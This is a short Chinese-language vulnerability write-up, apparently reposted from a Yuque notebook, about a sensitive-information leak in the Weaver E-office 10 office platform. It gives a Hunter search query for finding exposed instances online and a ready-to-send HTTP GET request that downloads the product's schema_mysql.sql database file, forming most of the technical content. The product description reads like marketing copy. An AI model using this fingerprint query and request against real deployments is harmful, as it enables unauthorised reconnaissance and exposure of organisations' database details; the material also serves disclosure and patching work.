登录 白背景
源码

泛微E-office 10 schema_mysql存在敏感信息泄露漏洞

一、漏洞简介

泛微eoffice10协同办公平台是一款专业的office办公的工具软件。软件支持在线多人编辑文件,并且会在第一时间收发协作需求。十分方便快捷,界面简约,布局直观清晰,操作简单,极易上手,是一款不可多得的利器。泛微E-office 10 schema_mysql存在敏感信息泄露漏洞

二、影响版本

  • 泛微eoffice10

三、资产测绘

  • hunterweb.body="eoffice10"&&web.body="eoffice_loading_tip"
  • 特征

1698653007369-68378554-67e1-486a-ae57-fc08061ab310.png

四、漏洞复现

GET /eoffice10/empty_scene/db/schema_mysql.sql HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

1723142050508-86a30c99-dccc-4954-a6ad-97cce81fc1d2.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ra2vx7n7mmi80grg